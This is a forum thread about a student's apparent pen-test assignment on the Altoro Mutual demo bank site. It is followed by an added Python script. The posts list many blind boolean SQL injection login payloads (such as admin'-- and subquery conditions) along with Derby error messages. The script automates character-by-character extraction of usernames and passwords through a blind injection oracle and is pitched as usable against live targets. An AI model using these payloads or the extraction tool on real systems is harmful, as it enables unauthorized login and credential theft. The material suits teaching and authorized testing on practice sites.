Help on pen test assignment -- altoro mutual site
Hi.
I have to pen test the Altoro Mutual site (https://demo.testfire.net) for a project. The site uses Derby DB.
I have discovered that its login page is vulnerable to blind boolean sqli.
I have discovered that there is a table called accounts under schemaname of APP (ie. APP.accounts).
I typed in
Username: admin' and (select count(user) from app.accounts where user like '%a%')>0-- Password: anything
This tests whether there is a user that contains a letter 'a'. If the test succeeds altoro mutual site logs in. Otherwise it says "Login Failed: We're sorry, but this username or password was not found in our system. Please try again."
I've tried the same test but this time iterated from a-zA-Z. But it never succeeds in logging in, which tells me that maybe the username is not in the English alphabet. But this is unlikely.
So my problem is I don't know why LIKE operator doesn't return a result that is expected.
I also tried
Username: admin' and (select count(user) from app.accounts where user not like '%a%')>0-- Password: anything
And this time every iteration of a-zA-Z logs in. So this result also tells me Username does not contain a letter.
Lastly this one works (it logs in)
Username: admin' and (select count(user) from app.accounts where user like '%')>0-- Password: anything
Can you help me why LIKE operator fails when user LIKE '%a%' and so on?
Thanks.
There are 5 usernames and they're all in English. Your problem has nothing to do with the LIKE operator not working. You are over complicating things that are actually pretty easy. And it is easy: https://www.hellboundhackers.org/challenges/basic16/index.php
Huitzilopochtli wrote: There are 5 usernames and they're all in English. Your problem has nothing to do with the LIKE operator not working. You are over complicating things that are actually pretty easy. And it is easy: https://www.hellboundhackers.org/challenges/basic16/index.php
I know I can log in as admin by
Username: admin'-- Password: anything
Then you can get list of users in admin page.
BUT, the point is to get that information using SQL injection.
I tried
admin' and (select count(user) from app.accounts where user in ('admin', 'jdoe', 'jsmith', 'sspeed', 'tuser'))>0--
BUT gets
Login Failed: We're sorry, but this username or password was not found in our system. Please try again.
I've also tried replacing space with /**/ but still no luck.
More info: The following gives this error:
Username: admin' order by 2--
Column position '2' is out of range for the query expression.
But
Username: admin' order by 1--
logs me in… which is strange, because I would expect there to be at least two columns, user and passwd or something like that.
Yet more info: The following
admin' and (select count(*) from accounts)>=5--
logs in but
admin' and (select count(*) from accounts)=5--
doesn't.
So there are at least 5 records in the accounts table. Actually the number is 10, which makes no sense.
admin' and (select count(*) from accounts)=10--
This logs in.
Yet more info: This is the weirdest thing
Username: admin' having '1'='1
gives error
Column PASSWORD is referenced in the HAVING clause but is not in the GROUP BY list.
But we've established that there is only 1 column, and that is user. :O
Username: admin' and (select count(user) from accounts)>0--
This logs in.
Yet more stuff: This
admin' and (select count(password) from accounts)>0--
gives HTTP 500 error
also
This
admin' and (select count(password) from app.accounts where password like '%a%')>0--
gives HTTP 500 error
Right I'm confused here.
Is your assignment to construct a single sql statement that will log you into the site as admin, or is it to extract the usernames and passwords from the database ?
If it's to recover the passwords of each account, you can see both the user and table names after you log in, so there is nothing here that is left to guesswork.
If php_errors are on you can use UNION and CONCAT to retrieve the password data
If errors are off, well it's no big deal as you already said you are aware of a blind injection point, so you can just extract the data one character at a time from there.
Huitzilopochtli wrote: Right I'm confused here.
Is your assignment to construct a single sql statement that will log you into the site as admin, or is it to extract the usernames and passwords from the database ?
If it's to recover the passwords of each account, you can see both the user and table names after you log in, so there is nothing here that is left to guesswork.
If php_errors are on you can use UNION and CONCAT to retrieve the password data
If errors are off, well it's no big deal as you already said you are aware of a blind injection point, so you can just extract the data one character at a time from there.
Hi. Thanks for your interest.
Yes, I'm trying to get usernames and passwords (or any other info) by using SQL injection.
The site is not PHP but JSP, and the database is Derby DB.
I'm not sure why the queries above don't work.
For example, the following page lists the reserved words:
https://db.apache.org/derby/docs/10.2/ref/rrefkeywords29722.html
Reserved identifiers need to be enclosed in "".
I think one of the columns in app.accounts is user. But user is a reserved word in Derby. Maybe that's why they don't work as expected?
So I try
admin' and (select count("user") from app.accounts where "user" >= 'a')>0--
gives error
Column 'user' is either not in any table in the FROM list or appears within a join specification and is outside the scope of the join specification or appears in a HAVING clause and is not in the GROUP BY list. If this is a CREATE or ALTER TABLE statement then 'user' is not a column in the target table.
Any ideas? I've tried with "USER", "User" and "user".
This
admin' and (select count(password) from app.accounts where password >= 'a') > 0 --
gives HTTP 500 error :O
PS. I figured out why there is only one column name in the SELECT clause. It is because the query is something like:
SELECT COUNT(*) FROM app.accounts WHERE user=$$$ AND password=$$$;
More info:
If payload is
admin' and (select count("user") from app.accounts where "user" > 'a') > 0--
SQL becomes
ij> select count(*) from app.accounts where "user"='admin' and (select count("user") from app.accounts where "user" > 'a') > 0;
1
1
There is only one user='admin'… This should log in.
If payload is:
' and (select count("user") from app.accounts where "user" > 'a') > 0--
then
ij> select count(*) from app.accounts where "user"='' and (select count("user") from app.accounts where "user" > 'a') > 0;
1
0
This shouldn't log in.
Also
ij> select count(*) from app.accounts where user='admin' and (select count(user) from app.accounts where user > 'a') > 0;
1
0
This shouldn't log in. user is not surrounded by "".
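Huitzilopochtli's first reply says the data can be pulled out one character at a time through the blind injection point, and the last post narrows the oracle down to a query of the shape SELECT COUNT(*) FROM app.accounts WHERE user=... AND password=.... The script below is an added example, not code from the thread or from the Altoro Mutual project, and shows that character-by-character extraction against a simulated copy of such a login query. Assumptions: sqlite3 stands in for Derby as an offline oracle; the table app.accounts with columns USER_ID and PASSWORD, and the password values, are constructed for the simulation (the real column names are not established on the page); the five usernames are the ones named in the thread. The payloads use syntax Derby accepts: double-quoted identifiers, SUBSTR, LENGTH, MIN and `--` comments. Note that in Derby an unquoted `user` is the USER special register (the current authorization id), not a column reference, so every injected condition here quotes the column name explicitly.

```python
"""Blind boolean SQL injection against a simulated Derby-style login query.

Added example, not code from the thread. sqlite3 is only the offline oracle;
the schema (app.accounts with USER_ID / PASSWORD) and the seed rows are
constructed stand-ins, not the real Altoro Mutual database.
"""
import sqlite3
import string

# Constructed seed data: the five usernames the thread names, passwords invented.
SEED_ROWS = [
    ("admin", "Adm1n!pass"),
    ("jdoe", "demo1234"),
    ("jsmith", "demo1234"),
    ("sspeed", "sp33d"),
    ("tuser", "tuser"),
]

# Shape of the vulnerable query the thread infers; both inputs are concatenated
# unescaped, which is the injection point. Identifiers are quoted, as Derby needs.
LOGIN_SQL = ('SELECT COUNT(*) FROM app.accounts '
             'WHERE "USER_ID"=\'{u}\' AND "PASSWORD"=\'{p}\'')

CHARSET = string.ascii_letters + string.digits + "_-!@#$%^&*.?"


def make_oracle():
    """Return login(username, password) -> bool backed by the vulnerable query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS app")  # Derby-like APP schema prefix
    conn.execute('CREATE TABLE app.accounts ("USER_ID" TEXT, "PASSWORD" TEXT)')
    conn.executemany("INSERT INTO app.accounts VALUES (?, ?)", SEED_ROWS)

    def login(username, password):
        sql = LOGIN_SQL.format(u=username, p=password)
        try:
            (count,) = conn.execute(sql).fetchone()
        except sqlite3.Error:
            # A real app would answer a syntax error with HTTP 500 (as in the thread);
            # the oracle simply treats that as "login failed".
            return False
        return count > 0

    return login


def ask(login, condition):
    """Boolean oracle: inject `condition` behind the known-valid user 'admin'.

    The login succeeds exactly when the condition is true, because the
    trailing AND "PASSWORD"='...' is commented out by the '--'.
    """
    return login("admin' AND (" + condition + ") --", "anything")


def extract_scalar(login, expr, max_len=64):
    """Recover the string value of a scalar SQL expression one char at a time.

    Returns None when expr is NULL: LENGTH(NULL) is NULL, so no length matches.
    """
    length = next((n for n in range(max_len + 1)
                   if ask(login, "LENGTH(%s) = %d" % (expr, n))), None)
    if length is None:
        return None
    value = ""
    for i in range(1, length + 1):
        for c in CHARSET:
            if ask(login, "SUBSTR(%s, %d, 1) = '%s'" % (expr, i, c)):
                value += c
                break
        else:
            raise ValueError("char %d of %s is outside CHARSET" % (i, expr))
    return value


def dump_accounts(login):
    """Walk the table in sorted order without knowing any username in advance:
    each step asks for the smallest USER_ID greater than the last one found,
    then pulls that user's password the same way."""
    found = {}
    last = ""
    while True:
        user = extract_scalar(login, "(SELECT MIN(\"USER_ID\") FROM app.accounts "
                                     "WHERE \"USER_ID\" > '%s')" % last)
        if user is None:  # MIN over an empty set is NULL: table exhausted
            break
        found[user] = extract_scalar(login, "(SELECT MIN(\"PASSWORD\") FROM app.accounts "
                                            "WHERE \"USER_ID\" = '%s')" % user)
        last = user
    return found


if __name__ == "__main__":
    oracle = make_oracle()
    for user, pw in sorted(dump_accounts(oracle).items()):
        print("%-8s %s" % (user, pw))
```

The MIN(...) > last walk recovers the usernames without guessing them, which is what the `user in ('admin', 'jdoe', ...)` attempt in the thread was trying to avoid. Each character costs at most one request per charset entry, so against a live target a value of ten characters is a few hundred requests; a binary search on the character code would cut that down, but Derby has no ASCII() function, so the linear scan over SUBSTR(...) = 'c' is the portable form.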